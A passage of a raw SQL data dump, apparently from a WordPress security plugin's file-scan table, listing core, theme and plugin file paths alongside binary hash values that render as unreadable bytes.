��<8�m�ꔟ','wp-content/themes/wp-barrister/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�R��|*m�bT�=N','���v��{;ft]�B�pV�;y���fCj�','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OSSfb��\r�E捵�','',0,'?'),('�\nǷ�J�A�He�qnQ�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',0,'����!�Й�~L�C��','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�_��S�ަ�:{j�}','wp-content/plugins/wp-cerber/assets/flags/do.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���*{\0�4��sV','\n�/�H��Ҿ/���\\����-ܧ��Rx�','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m����{d�X��',')\\k���:Es�%vn�6Z�R\ng�N*1D��)&�','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�\"e!h��N�\\�\0\Z]z','wp-content/themes/gambit/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')E(0����%��','|��(Wb���j��̐� :�`� ��|��u��','',0,'?'),('�6R�=Sz�F�GfZ�','wp-content/themes/anima/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���:\'w�80�&�{�','n�s_s�)��3W�L �b-�?�p.\'$2����','',0,'?'),('�8痣4���J����','wp-includes/wp-includes/images/smilies/icon_smile.gif',0,'��3�.)�2���p���','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('�8�d���Pf�6 ڋ','wp-content/themes/capacious/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�pe�5���-��r�','��G���$s���o�L%�Å6�=3*w5� %n','',0,'?'),('�=��X<;��r@��','wp-includes/wp-includes/pluggable-deprecated.php',0,'@���\"�j��2�ߖ','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('�N�� �r��]U�|7','wp-content/themes/newsmag/assets/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3B�B4z\\�&��l�','_x�%��,2G�|���<���w8�`�����','',0,'?'),('�Q��@O?�S�\r��9�','wp-includes/wp-includes/js/jquery/ui/tooltip.min.js',0,'a�\r��c5V����h','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ͳ���k�o�T��A=','�ӵ�f�K��N�_β�s:�v%�Y=����','',0,'?'),('�\\���ȷLy���','wp-content/themes/weblog/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s7`����P��,','�����t���jnq�\"��ti�T�pϽ�e��','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�k�E���浉3','wp-content/themes/hueman/assets/front/img/header/nyc.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sx\'i�LY���b��','�f�Z\\B[� ,Ĵ���\\ۂ$��چŏ�U¸','',0,'?'),('�tfF �r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o�H?6\Z���x','(����%�����C��㏞�d�\"��A��','',0,'?'),('�|��U�5���b�','wp-content/themes/advance/images/ui.totop.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��QQ� ���xV���','�9�OX)����F��W�d7���5w5�O','',0,'?'),('��5e-8\Z��Ι98','wp-includes/wp-includes/class-wp-metadata-lazyloader.php',0,'I^�P���;$�+\"�','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('��JH\Z�EM�u�K�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����G�Q�',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('��o|��lP�=�Q��I','wp-includes/wp-includes/class-wp-locale-switcher.php',0,'��\"�?�F�w,�T��','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('��Ę��\0��J���O4','wp-content/themes/advance/inc/kirki/assets/scss/controls/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�Gw5�56����W�`','��(�;ȷ|��������i��)B��h�I','',0,'?'),('���3�l�m��Y~; ','wp-content/themes/advance/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cQ�˵��/�Jwc���a','\0�U bL1T�\"�Ɣj]_Ʀ,y�][��8jp$','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�ςHv���#,ײ/�7','wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js',0,'�?�~s���i6G�/','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�ܒI}v�ea� f�','wp-content/themes/promote/inc/kirki/assets/js/controls/number.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��;�d�|��^�-�','��A�\r�B@�?X�����F*��Ѹ���','',0,'?'),('��G��R�9�D��4�','wp-content/themes/skt-pathway/images/img_404.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WkuЏ��\\�S*6','��f�jZ���o��q0\"�&sx�^~�U� ','',0,'?'),('��;\\�V����AޅRd','wp-includes/wp-includes/customize/class-wp-customize-theme-control.php',0,'� �K���WTՂ�c�','� �K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('�\n�ot}l�!E�`I','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\0�\\��n�+��Ö','ƌ�%{�cUkw��\r��^p%���$L�`��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('�\rĞ\"Fl~��\\^�C','wp-content/themes/weblog/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�\rPC��\"d','}밝�e��<��(��>/<B�T���vyW�Xx','',0,'?'),('��������0R�q�','wp-content/themes/advance/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��\Z�%�\\C>|\Z�','w�;,�Yný럢[vp��yј2\"����O�','',0,'?'),('������/�n����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r]��^g��\Z�/]T��','�y�涩�x���Ƞa}���s矛���+�br)','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('�4\r�KD��ɼS�','wp-content/themes/newsmag/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�g~���>z<8Ҡ','�����}X�]��Xdv;>�T�8��/�d|��+','',0,'?'),('�4$����\r#s7\Z��]','wp-includes/wp-includes/css/dist/block-library/editor.css',0,'0>>�~��u��WlY','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I ���g\0�����a�B','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�KI\'Q��H}M�F��','wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js',0,'��_�vQ8_�$�?��','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('�PC<�� ���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�) ~����ܖݟr','',0,'?'),('�^4�x#�J#��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A/����v��','CX��%�.�wC���TA6B<�\"w���c�5� l','',0,'?'),('�^�l��-Rp��','wp-content/themes/anima/content/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"g>a�1����ra��','�����G9t&�D��nI*�ހ��@M��','',0,'?'),('�`H@\Zw�Jk�s�Ϡ�J','wp-content/themes/auberge/template-parts/loop-blog-condensed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','du�c�>j\n3A��?','����2%牊�\\��P�%�;+0hH��\r_','',0,'?'),('�a�\\\r��S����[','wp-content/themes/weblog/acmethemes/customizer/design-options/background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�8S}�Y����R�3','�� ^��̯\0�#ᵅ�{l��{F{]F�|�c','',0,'?'),('�m�CB.ե�>F_�#','wp-content/themes/twentynineteen/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�md��~����','�6�!1oAu�Eo���Fw�9\n4\0�\\%wM�\r�g','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('����h�B!��','wp-content/themes/spidermag/assets/css/spidermag-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�xgB�^� ��S','|�\\E�r,�uL)�㙳 }Ʃ/G�T����1�','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�%?b�����~\0','o~!��A3V�x|�t�;�\'�3�-�I�\n�','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('��~���m46ݰ�','wp-content/themes/capacious/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sp�9@��u�=��<�','�*v�e�`�V�.͙���I\r�`t�xXQh��','',0,'?'),('���:T�L�5�EF�Vc','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�v_�`���n�/T','�P��s\'\n�B��KM$꼓rfy6yݵ[���e','',0,'?'),('������� \Z\' �l�','wp-content/themes/hueman/option-tree/assets/images/ot-select-hover-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�q��\r�ִ��줫','P o�@(�.:���J����\0��G�^~��C�p�','',0,'?'),('���O�se���\'��|','wp-content/themes/newsmag/assets/vendors/machothemes/components/mainslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v���1H�%��F','4?5���qM��筟}fı:O�m@��\"]dv�','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\na�g/�H��2*�e','n�R��Z�,�7G\'���fͺi߶� �+!c��','',0,'?'),('���*[�Tx���R��','wp-content/themes/hueman/assets/front/js/_parts/main.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o@$��0�xIw]','���Ʌ2��7J>9Q���6#�b6�Z6�G�,�','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙ���~��M♸�','IoT�]��j�J��~�ď�7bn!M|��!F��','',0,'?'),('���w�E�d@�\n�','wp-content/themes/event/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\'g�B�4���','m9��\'mՃ<�F%��3�r��ۑɘ�,�`�','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZS-�.��G|J\"5','�Q�A.V�i��#\r�RJ���i.7�@B��d�','',0,'?'),('�����Ƚ\",an\'�x','wp-content/themes/fastblog/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�2��7w�Qi�z@���','4�UD#�*����^�����L0B�Z�','',0,'?'),('��`���g�2^DL','wp-content/themes/advance/js/advance.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>i:�5���$�g','%0��А��nD�h ���-L���n�','',0,'?'),('� 4-��O5�a(yP�3','wp-content/themes/advance/parts/part-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�}4�ő�4��֚',':�V�g�q����D����`�5sqJQ�5��','',0,'?'),('��Qw�1��ߍ�;M�','wp-content/themes/hueman/assets/front/img/demo/1-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�;�W�̂l%N܊�','�ŃȚʞ����6����\r(�qV�yۙ��','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�Nics�I�I','wp-includes/wp-includes/PHPMailer/PHPMailer.php',0,'�in=��2�����:G','�in=��2�����:G','����r����p�NX����7�����?H�RG��','',0,'?'),('�B�F�k8�G�d+','wp-content/themes/promote/inc/kirki/includes/styles/class-kirki-styles-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�]F�ș�ێ����','��J�3l`��y���\Z��ր��\0�=$`(!���}','',0,'?'),('��l�a����gڌ�','wp-content/themes/promote/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k\'Bċ(�K�lT�','\Z��L�S�-�yn���&dlO��������U','',0,'?'),('�)Sl�W)�l�h�J\'.','wp-content/plugins/wp-cerber/assets/flags/me.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{H`C��~���^8�X','��&�P�-urk�P�����\"~aZ��ޢ�','',0,'?'),('�/�q�7-!�to�쿋','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',0,'�y$�NX���l��l','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('�2�>�[{�Lj�0�s�','wp-content/plugins/wp-cerber/assets/flags/ai.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�]��à�a�{��','*[3#�h���\"M�@]l�Ή05>И��ۖf','',0,'?'),('�4��g�G�aGo��]','wp-content/themes/sg-window/inc/css/sidebar-widget.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��@w��Dg�t}_','��ܔZ\0�҂������5�>0��z�-;�Fa�u','',0,'?'),('�8.�hW�h�V�S','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-full-expand.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���pH\n�m�Oi��','F1:�p��\0�J3M�E�n�ۚIz�`�9�_�','',0,'?'),('�:��z�E�OD��v��','wp-content/themes/advance/inc/kirki/assets/js/controls/radio-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�E뵄ڇE\"k��pi','� �2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"x�;���h�O���','��I}l�|U�j�Pr���7��ڲkV���`��','',0,'?'),('�>��o߷m�ƹj\'oW�','wp-content/themes/wp-barrister/library/images/reply.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�UM� #��>}���','g�E�A��݃ơ�\'ˋ��\n��4 �:�\r*N�','',0,'?'),('�?L�� ƹɷހi','wp-includes/wp-includes/customize/class-wp-customize-image-control.php',0,'j�f�� ˥�^�К','j�f�� ˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�A�}o#�j�ijՇ$�','wp-content/themes/newsmag/Gruntfile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p\"&>N-����','N�F � ��3�F-b��\0�V4��BF��g��','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yk|��v���','*�x)��68NHɎ3 �AhC� \'q~a� I<�','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�Ry��i��N�Z�','wp-includes/wp-includes/js/dist/vendor/react.min.js',0,'�jB���e�}����\"\Z','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('�V�����#�L�ؙA','wp-includes/wp-includes/js/dist/primitives.min.js',0,'�>�1��~�i!�EKHK/','�>�1��~�i!�EKHK/','�S�R�8P���oa:@c���E~�|�Ji�','',0,'?'),('�`���h4�q�\n,?Q','wp-content/themes/spidermag/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����rnL�Y�n��','�뷡[�!b�m���+\'W�Ǻ��r�\r�}7��I','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�v�\'�\"�36��:o�','wp-content/themes/newsmag/inc/widgets/homepage_slider/class-widget-newsmag-homepage_slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�cY�(\\��@�,�','>�\'c�T���H/Or�2~S��k\\��A����j�.e','',0,'?'),('�v�\0���������','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',0,'�q͊����tF����','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�w i��٤��S��_','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��_W�u�Ym鉲','�<Y�~P�d�us\\�><���J��}�B��X','',0,'?'),('�w�\Z��plUz�Q�','wp-content/plugins/wp-cerber/assets/flags/ly.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�,ʁ���]��r�V','t��\n�jM��l��0�^��f&���`ʃ','',0,'?'),('�x$�!\r�q)?&�`s','wp-content/themes/hueman/assets/czr/css/czr-control.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n �Q^Su�?�c�','Z�D{���ӟ�1z�s�� ��U�p`M�j�','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O �.�����.��>��CEj��','',0,'?'),('����z���ĎBF�S_','wp-includes/wp-includes/css/dist/nux/style-rtl.css',0,'�ip����8\0p���','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��FK�0��\0]0','?����l�̚U�^���t1\0#U|Yh�|�\"\Z','',0,'?'),('����92R]�X~�i�','wp-content/plugins/wp-cerber/assets/flags/bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��g��:�uO�c','�{h�s`�W�\\�v���n�OF�\Z�r���J�s','',0,'?'),('���9a��\\]�;��[�','wp-includes/wp-includes/Requests/Exception.php',0,'�����\0��3�\Z�RI','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('��|������V��\n','wp-includes/wp-includes/blocks/verse/block.json',0,'��h�h>��K3���u1','��h�h>��K3���u1','��ߋ�!�;n�^�u|ا�$Y0�56��4�','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i� b�4l~�e�F��mj�','',0,'?'),('���xa������;��X�','wp-content/themes/Kent/content.php',0,'�)AX�x�[��\0�\nQ','�)AX�x�[��\0�\nQ','�(0\'���2�g�2 3隀���vA�CC��0','',0,'?'),('��`�Ǜ�qܱ8�I','wp-includes/wp-includes/blocks/button/block.json',0,'\\��]��u���H(','\\��]��u���H(','A$\Z�\Z�d��1�����/�ހ[�7�G','',0,'?'),('��O\n �U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;F4�A�I���T�','v��C��� a�\'F�;���z���(eJ��L','',0,'?'),('��q�6���0�W�8� �','wp-content/themes/storeone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�rߚ��-�L�y','=�\0�1x|������>��U�Հ.X�g�nE��','',0,'?'),('���&a;��_�Ɩ@','wp-content/themes/weblog/acmethemes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7q54�BMN���8','00V`ȕ_��/ d\0*��D>�x���L�=mt~N�','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�M��l~%������','\\�%k�����;�,����ay\\�s�A\'','',0,'?'),('��f���*�Hq�S','wp-content/themes/auberge/readme.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gM���G����y��$','�g������J1������� <Wg�J��','',0,'?'),('�=��m��c���','wp-includes/wp-includes/class-wp-customize-widgets.php',0,'��,���^Oި�����','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qT������b�W�[}','�P\'���)�Y&T��j���A�- \"��2~','',0,'?'),('�!s\'M�.0����','wp-content/themes/sg-window/img/222.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+/~�;+��^jr\0�\0','�B��Mi;��\\s:`z��!/IR7�9=w�Ȩ�','',0,'?'),('�*i�8��]�\n4����','wp-content/themes/twentynineteen/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0)ݴ�`I4�P?Y$2|\n','��$�eI�8a��*�����\0��D��B�0','',0,'?'),('�+�$�b�T]\Z�@N�','wp-content/themes/newsmag/assets/vendors/blazy/blazy.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dp�\0x4^��2�a�7 ','�:����j�:��4`S��\Z��\Z���\\Ij4�3','',0,'?'),('�<t@�zfj����r�h','wp-content/plugins/wp-cerber/assets/flags/ht.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wѭ�b;��t�','#{�՞p�.3��T���[�Kj�P�x�=','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('�T��,;\"Y<�~��','wp-content/themes/advance/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�uP�Q�?��8��<','�#]yg��YrU7�xt�\"�[����XZYi�#=','',0,'?'),('�n���>EP�@ ;�k�','wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php',0,'M��`f��\0�iu�','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w�� ���','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gx�Fy1w��','�s7�-<%���WȒߚC�.��. ��zW','',0,'?'),('�{\rQ�(+�29�R�+�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#�H�ڻJF6Y','�_�ࡆ�����a#!\r�|zڔd�+�4\0�b$','',0,'?'),('�|�l�ӌ��x���o','wp-content/themes/sg-window/inc/widget-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��\\��K\Z���[','Hݱ��o,�>\'��g ��!�u�(�<�C��nF�','',0,'?'),('�\rrƹϘ菳�����','wp-includes/wp-includes/js/jquery/ui/spinner.min.js',0,'0�������<8z�+','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('���E��(Ϊ=����','wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php',0,'Vj��B���ر���q','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� �b����d�]F�i�POZq��','',0,'?'),('��L���M82�\0ȳUx','wp-content/themes/advance/inc/kirki/assets/css/customizer.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q��D��%Γ�j','��yt��؞g_m ����\0ܝ\'<(xA���� ','',0,'?'),('�� C�-�u��\Znb�','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')����D�F^�0\r�','�\Z�d�6��f\0��Iz���(�|���','',0,'?'),('��?ʑ+��2��_��','wp-content/themes/promote/inc/kirki/assets/scss/panels/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6IT���+��8t=','�B�2��锳§�lyk(��G����','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�[x�N�:���dw#\\','�R�/Q�O�l��@���c�0�\0a`n�o��<','',0,'?'),('��Ƹdg�}��U¼','wp-content/themes/advance/inc/kirki/assets/scss/controls/toggle.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aD@\n���t\'���C��','�ܫ��J?E�E=�0_� 